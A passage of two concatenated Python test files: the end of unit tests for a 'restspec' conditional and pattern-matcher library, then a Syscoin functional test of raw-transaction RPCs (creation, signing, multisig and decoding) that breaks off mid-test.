f = self.f({'format': ['John']})
self.assertEqual('Hello John!', f('Hello {}!'))
self.assertEqual('Goodbye John!', f('Goodbye {}!'))
def test_root(self):
f = self.f([{'attr': 'ham'}, {'context': 'root'}, {'attr': 'spam'}])
self.assertEqual('sausages', f({'ham': 'eggs', 'spam': 'sausages'}))
f = self.f(['Hello {}!', {'format': [[{'context': 'root'}, {'attr': 'name'}]]}])
self.assertEqual('Hello John!', f({'name': 'John'}))
def test_ifelse(self):
f = self.f({'if': {'is_eq': 23}, 'then': 'abc', 'else': 'def'})
self.assertEqual(f(23), 'abc')
self.assertEqual(f(24), 'def')
class ConditionalTests(Tests):
def c(self, obj):
obj = json.loads(json.dumps(obj), object_hook=restspec.WarnOnUnusedKeys)
return restspec.Conditional.from_restspec(obj)
def test_missing(self):
with self.assertRaises(ValueError):
self.c({})
def test_always_false(self):
c = self.c("never")
self.assertFalse(c({}))
self.assertFalse(c("abc"))
self.assertFalse(c({"spam": "ham"}))
r = {"spam": "ham"}
self.assertFalse(c("ham", {"parent": r, "key": "spam", "root": r}))
def test_none(self):
c = self.c(None)
self.assertFalse(c({}))
self.assertFalse(c("abc"))
self.assertFalse(c({"spam": "ham"}))
r = {"spam": "ham"}
self.assertFalse(c("ham", {"parent": r, "key": "spam", "root": r}))
def test_always_true(self):
c = self.c("always")
self.assertTrue(c({}))
self.assertTrue(c("abc"))
self.assertTrue(c({"spam": "ham"}))
r = {"spam": "ham"}
self.assertTrue(c("ham", {"parent": r, "key": "spam", "root": r}))
def test_attr_exists(self):
c = self.c({'attr_exists': 'attr'})
self.assertTrue(c({'attr': 'ham'}))
r = {'spam': 'ham'}
self.assertFalse(c(r, context={"root": r}))
r2 = {"attr": r}
self.assertFalse(
c(r, {"attribute": "attr", "parent": r2, "root": r2}))
def test_eq_value(self):
c = self.c({'is_eq': 42})
self.assertTrue(c(42))
self.assertFalse(c(43))
c = self.c({'eq': [{"context": "value"}, 42]})
self.assertTrue(c(42))
self.assertFalse(c(43))
def test_eq(self):
c = self.c({'eq': [42, {"attr": "spam"}]})
self.assertTrue(c({"spam": 42}))
self.assertFalse(c({"spam": 43}))
def test_attr_name_is(self):
c = self.c({'eq': ["permalink", [{"context": "attribute"}]]})
r = {"permalink": "abc", "spam": "def"}
self.assertTrue(
c(r["permalink"], {"attribute": "permalink", "parent": r}))
self.assertFalse(
c(r["spam"], {"attribute": "spam", "parent": r}))
def test_not(self):
c = self.c({'not': {'is_eq': "apples"}})
self.assertFalse(c("apples"))
self.assertTrue(c("oranges"))
def test_any(self):
c = self.c({'any': [{'is_eq': 'pear'}, {'is_eq': 'apple'}]})
self.assertTrue(c("pear"))
self.assertTrue(c("apple"))
self.assertFalse(c("orange"))
def test_any_recover(self):
c = self.c({'any': [{'eq': ['ham', {'context': 'attribute'}]},
{'is_eq': 42}]})
self.assertTrue(c(42))
self.assertFalse(c(43))
def test_all(self):
c = self.c({'all': [
{'is_eq': 'spam'},
{'eq': ['ham', {'context': 'attribute'}]}
]})
self.assertTrue(c("spam", context={'attribute': 'ham'}))
self.assertFalse(c("spam", context={'attribute': 'eggs'}))
self.assertFalse(c("spam", context={}))
self.assertFalse(c("orange", context={'attribute': 'ham'}))
def test_not_conditional(self):
with self.assertRaises(ValueError):
self.c(42)
with self.assertRaises(ValueError):
self.c({"value": ['abc']})
def test_raw_value(self):
c = self.c(True)
self.assertTrue(c({}))
c = self.c(False)
self.assertFalse(c({}))
def test_implicit_and(self):
c = self.c({'attr_exists': 'abc', 'eq': [{'attr': 'spam'}, 'ham']})
self.assertTrue(c({'abc': 0, 'spam': 'ham'}))
self.assertFalse(c({'abc': 0, 'spam': 'eggs'}))
self.assertFalse(c({'abc': 0}))
self.assertFalse(c({'spam': 'ham'}))
def test_mixed(self):
with self.assertRaises(ValueError):
self.c({'attr_exists': 'abc', 'value': 'True'})
def test_match(self):
c = self.c({'matches': {'prefix': 'link_', 'suffix': '_url'}})
self.assertTrue(c('link_stuff_url'))
self.assertFalse(c('link_stuff'))
self.assertFalse(c('stuff_url'))
self.assertFalse(c('link_url'))
c = self.c({'matches': {'pattern': 'link_.*_url'}})
self.assertTrue(c('link_stuff_url'))
self.assertFalse(c('link_stuff'))
self.assertFalse(c('stuff_url'))
self.assertFalse(c('link_url'))
def test_hint(self):
c = self.c([{'context': 'attribute'}, {'matches': {'suffix': '_url'}}])
self.assertEqual(c.attr_name_hint('abc'), 'abc_url')
self.assertEqual(c.attr_name_hint('xyz'), 'xyz_url')
def test_nohint(self):
cs = [
self.c(True),
self.c([{'attr': 'abc'}, {'attr': 'def'}, {'is_eq': 'ghi'}]),
self.c([{'attr': 'abc'}, {'is_eq': 123}]),
self.c([{'context': [{'attr': 'abc'}, {'attr': 'def'}]},
{'is_eq': 'ghi'}]),
self.c([{'context': {'attr': 'abc'}}, {'is_eq': 123}]),
self.c([{'context': 'value'}, {'is_eq': 123}]),
self.c([{'context': 'attribute'}, {'is_eq': 123}]),
]
for c in cs:
with self.assertRaises(restspec.NoValue):
c.attr_name_hint("test")
class MatcherTests(Tests):
def m(self, spec):
return restspec.Matcher.from_restspec(self.to_config_dict(spec))
def test_false(self):
m = self.m(None)
self.assertFalse(m('abcdef'))
self.assertFalse(m(''))
self.assertEqual(m.pattern, None)
def test_true(self):
m = self.m("any")
self.assertTrue(m('abcdef'))
self.assertTrue(m(''))
self.assertEqual(m.pattern, re.compile(''))
def test_pattern(self):
m = self.m({'pattern': 'abc.*def'})
self.assertTrue(m('abcdef'))
self.assertTrue(m('abcxyzdef'))
self.assertTrue(m('abc123def'))
self.assertFalse(m('abc'))
self.assertFalse(m('abcxyz'))
self.assertFalse(m('xyzdef'))
self.assertFalse(m('def'))
self.assertFalse(m('xyz'))
self.assertFalse(m(''))
self.assertEqual(m.pattern, re.compile('abc.*def'))
def test_prefix(self):
m = self.m({'prefix': 'abc'})
self.assertTrue(m('abc'))
self.assertTrue(m('abcdef'))
self.assertTrue(m('abc123'))
self.assertFalse(m(''))
self.assertFalse(m('def'))
self.assertFalse(m('123'))
self.assertFalse(m('defabc'))
self.assertEqual(m.pattern, re.compile('^abc.*$'))
def test_suffix(self):
m = self.m({'suffix': 'xyz'})
self.assertTrue(m('xyz'))
self.assertTrue(m('abcdefxyz'))
self.assertTrue(m('123xyz'))
self.assertFalse(m('xyzabc'))
self.assertFalse(m(''))
self.assertFalse(m('abc'))
self.assertFalse(m('123'))
self.assertEqual(m.pattern, re.compile('^.*xyz$'))
def test_prefix_suffix(self):
m = self.m({'prefix': 'abc', 'suffix': 'xyz'})
self.assertTrue(m('abcxyz'))
self.assertTrue(m('abcdefxyz'))
self.assertTrue(m('abc123xyz'))
self.assertFalse(m('xyzabc'))
self.assertFalse(m(''))
self.assertFalse(m('abc'))
self.assertFalse(m('123'))
self.assertFalse(m('xyz'))
self.assertFalse(m('abcxyz123'))
self.assertFalse(m('123abcxyz'))
self.assertEqual(m.pattern, re.compile('^abc.*xyz$'))
def test_prefix_suffix_escape(self):
m = self.m({'prefix': '$', 'suffix': '$'})
self.assertTrue(m('$abcdef$'))
self.assertTrue(m('$$'))
self.assertTrue(m('$123$'))
self.assertFalse(m('abc$'))
self.assertFalse(m('$abc'))
self.assertFalse(m('$'))
self.assertEqual(m.pattern, re.compile(r'^\$.*\$$'))
def test_nospec(self):
with self.assertRaises(ValueError):
self.m({})
def test_pat_nohint(self):
m = self.m({'pattern': 'abc.*'})
with self.assertRaises(restspec.NoValue):
m.hint('test')
def test_pat_expl_hint(self):
m = self.m({'pattern': 'abc.*', 'hint': 'abc{}def'})
self.assertEqual(m.hint('test'), 'abctestdef')
self.assertEqual(m.hint('abc'), 'abcabcdef')
self.assertEqual(m.hint(''), 'abcdef')
def test_prefix_hint(self):
m = self.m({'prefix': 'abc'})
self.assertEqual(m.hint('test'), 'abctest')
self.assertEqual(m.hint(''), 'abc')
self.assertEqual(m.hint('abc'), 'abcabc')
def test_suffix_hint(self):
m = self.m({'suffix': 'abc'})
self.assertEqual(m.hint('test'), 'testabc')
self.assertEqual(m.hint(''), 'abc')
self.assertEqual(m.hint('abc'), 'abcabc')
def test_prefix_suffix_hint(self):
m = self.m({'prefix': 'abc', 'suffix': 'xyz'})
self.assertEqual(m.hint('test'), 'abctestxyz')
self.assertEqual(m.hint(''), 'abcxyz')
self.assertEqual(m.hint('abc'), 'abcabcxyz')
def test_prefix_expl_hint(self):
m = self.m({'prefix': 'abc', 'hint': 'abc{}123'})
self.assertEqual(m.hint("xyz"), "abcxyz123")
def test_suffix_expl_hint(self):
m = self.m({'suffix': 'abc', 'hint': '123{}abc'})
self.assertEqual(m.hint("xyz"), "123xyzabc")
def test_prefix_suffix_expl_hint(self):
m = self.m({'prefix': 'abc', 'suffix': 'xyz', 'hint': 'abcxyz{}abcxyz'})
self.assertEqual(m.hint("123"), "abcxyz123abcxyz")
|
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from io import BytesIO
from test_framework.messages import CTransaction, ToHex
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
hex_str_to_bytes,
)
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
["-txindex"],
["-txindex"],
["-txindex"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info('prepare some coins for multiple *rawtransaction commands')
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
self.log.info('Test getrawtransaction on genesis block coinbase returns an error')
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
self.log.info('Check parameter types and required parameters of createrawtransaction')
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = '1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000'
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string (not 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844')", self.nodes[0].createrawtransaction, [{'txid': 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, "Invalid parameter, sequence number is out of range", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Syscoin address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
self.log.info('Check that createrawtransaction accepts an array and object as outputs')
tx = CTransaction()
# One output
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99}))))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
for type in ["bech32", "p2sh-segwit", "legacy"]:
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type))
# Test `signrawtransactionwithwallet` invalid `prevtxs`
inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type != "legacy":
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"vout": 3,
"amount": 1
}
])
#########################################
# sendrawtransaction with missing input #
#########################################
self.log.info('sendrawtransaction with missing input')
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1}] #won't exists
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
# SYSCOIN
assert 'in_active_chain' in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[0].getrawtransaction, tx, True, "foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[0].getrawtransaction, tx, True, "abcd1234")
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getrawtransaction, tx, True, "ZZZ0000000000000000000000000000000000000000000000000000000000000")
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[0].getrawtransaction, tx, True, "0000000000000000000000000000000000000000000000000000000000000000")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
if not self.options.descriptors:
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 SYS to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "redeemScript" : mSigObjValid['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000102616100000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
encrawtx = "020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff4b03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000ffffffff03f4c1fb4b0000000016001497cfc76442fe717f2a3f0cc9c175f7561b6619970000000000000000266a24aa21a9ed957d1036a80343e0d1b659497e1b48a38ebe876a056d45965fac4a85cda84e1900000000000000002952534b424c4f434b3a8e092581ab01986cbadc84f4b43f4fa4bb9e7a2e2a0caf9b7cf64d939028e22c0120000000000000000000000000000000000000000000000000000000000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], "03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000")
# Basic signrawtransaction test
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.nodes[0].generate(1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.nodes[0].generate(1)
self.sync_all()
# getrawtransaction tests
# 1. valid parameters - only supply txid
assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string "Flase"
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, "Flase")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, {})
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
